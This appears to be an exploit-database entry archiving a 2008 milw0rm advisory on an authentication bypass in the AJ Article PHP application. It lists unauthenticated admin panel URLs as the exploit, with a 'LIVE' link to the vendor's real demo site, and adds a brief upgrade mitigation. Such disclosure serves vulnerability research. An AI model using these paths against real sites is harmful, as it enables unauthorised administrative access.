header-logo
Suggest Exploit
vendor:
AJ Article
by:
G4N0K
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: AJ Article
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

AJ Article Auth Bypass Vulnerability

AJ Article is vulnerable to an authentication bypass vulnerability. This vulnerability allows an attacker to access the administrative panel of the AJ Article application without authentication. The vulnerable pages include user.php, articles.php, articlesuspend.php, site.php, statistics.php, mail.php, category.php, subcategory.php, changepassword.php, polling.php, logo.php, etc. An attacker can exploit this vulnerability by accessing the vulnerable pages directly.

Mitigation:

Upgrade to the latest version of AJ Article.
Source

Exploit-DB raw data:

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   | \ | |  / _ \  | |/ /
                    | |  _  | || |_  |  \| | | | | | | ' / 
                    | |_| | |__   _| | |\  | | |_| | | . \ 
                     \____|    |_|   |_| \_|  \___/  |_|\_\

==============================================================================
	AJ Article Auth Bypass Vulnerability
==============================================================================

	[»] Script:             [ AJ Article ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://www.ajsquare.com/products/article/ ]
	[»] Type:               [ Commercial ]
	[»] Report-Date:        [ 10.11.2008 ]
	[»] Founder:            [ G4N0K <mail.ganok[at]gmail.com> ]


===[ XPL ]===
	
	[»] http://localhost/[path]/admin/user.php
	[»] http://localhost/[path]/admin/articles.php
	[»] http://localhost/[path]/admin/articlesuspend.php
	[»] http://localhost/[path]/admin/site.php
	[»] http://localhost/[path]/admin/statistics.php
	[»] http://localhost/[path]/admin/mail.php
	[»] http://localhost/[path]/admin/category.php
	[»] http://localhost/[path]/admin/subcategory.php
	[»] http://localhost/[path]/admin/changepassword.php
	[»] http://localhost/[path]/admin/polling.php
	[»] http://localhost/[path]/admin/logo.php
	[»] ...
	


===[ LIVE ]===

	[»] http://www.ajsquare.com/products/demo/admin/


	
===[ Greetz ]===

	[»] ALLAH
	[»] Tornado2800 <Tornado2800[at]gmail.com>
	[»] Hussain-X <darkangel_g85[at]yahoo.com>

	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
	//ALLAH,forgimme...

===============================================================================
exit();
===============================================================================

# milw0rm.com [2008-11-10]